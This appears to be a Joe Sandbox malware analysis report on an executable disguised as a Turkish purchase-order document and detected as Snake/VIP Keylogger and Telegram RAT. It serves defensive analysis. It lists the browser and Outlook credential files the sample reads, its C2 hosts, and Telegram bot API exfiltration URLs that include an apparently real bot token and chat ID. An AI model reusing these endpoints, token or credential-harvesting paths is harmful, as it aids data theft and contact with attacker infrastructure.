                  Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 6368, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 6368, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 6368, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 6368, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 6368, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		12
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		1
                  Query Registry                  		Remote Services1
                  Email Collection                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		LSASS Memory21
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                  Virtualization/Sandbox Evasion                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Process Injection                  		NTDS41
                  Virtualization/Sandbox Evasion                  		Distributed Component Object Model1
                  Clipboard Data                  		4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging15
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586917 Sample: fiyati_teklif 65TBI507_ ON-... Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 2 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 46 11 other signatures 2->46 8 fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 fiyati_teklif 65TB... jpeg docx .exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 12 fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        18 WerFault.exe 21 16 8->18         started        signatures6 process7 dnsIp8 30 checkip.dyndns.com 132.226.8.169, 49701, 49710, 49714 UTMEMUS United States 12->30 32 api.telegram.org 149.154.167.220, 443, 49757, 49804 TELEGRAMRU United Kingdom 12->32 34 reallyfreegeoip.org 104.21.112.1, 443, 49704, 49706 CLOUDFLARENETUS United States 12->34 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 20 conhost.exe 16->20         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe71%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
                  fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                  http://anotherarmy.dns.army:8081100%Avira URL Cloudphishing
                  http://aborters.duckdns.org:8081100%Avira URL Cloudphishing
                  http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
                  http://varders.kozow.com:8081100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.112.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.8.169
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2010/01/2025%20/%2004:43:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icofiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://upx.sf.netAmcache.hve.8.drfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://chrome.google.com/webstore?hl=enfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://varders.kozow.com:8081fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://aborters.duckdns.org:8081fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://51.38.247.67:8081/_send_.php?Lfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://anotherarmy.dns.army:8081fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndns.org/qfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1518653300.0000000002521000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://reallyfreegeoip.org/xml/fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  132.226.8.169
                                                                  		checkip.dyndns.comUnited States
                                                                  		16989UTMEMUSfalse
                                                                  149.154.167.220
                                                                  		api.telegram.orgUnited Kingdom
                                                                  		62041TELEGRAMRUfalse
                                                                  104.21.112.1
                                                                  		reallyfreegeoip.orgUnited States
                                                                  		13335CLOUDFLARENETUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1586917
                                                                  Start date and time:2025-01-09 19:00:12 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 4s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:21
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Siparii jpeg docx .exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/11@3/3
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 79
                                                                  • Number of non-executed functions: 6
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.31.69, 23.56.254.164, 13.107.246.45, 4.175.87.197
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • VT rate limit hit for: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  13:01:04API Interceptor7414300x Sleep call for process: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe modified
                                                                  13:01:06API Interceptor10x Sleep call for process: powershell.exe modified
                                                                  14:52:41API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  132.226.8.169jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
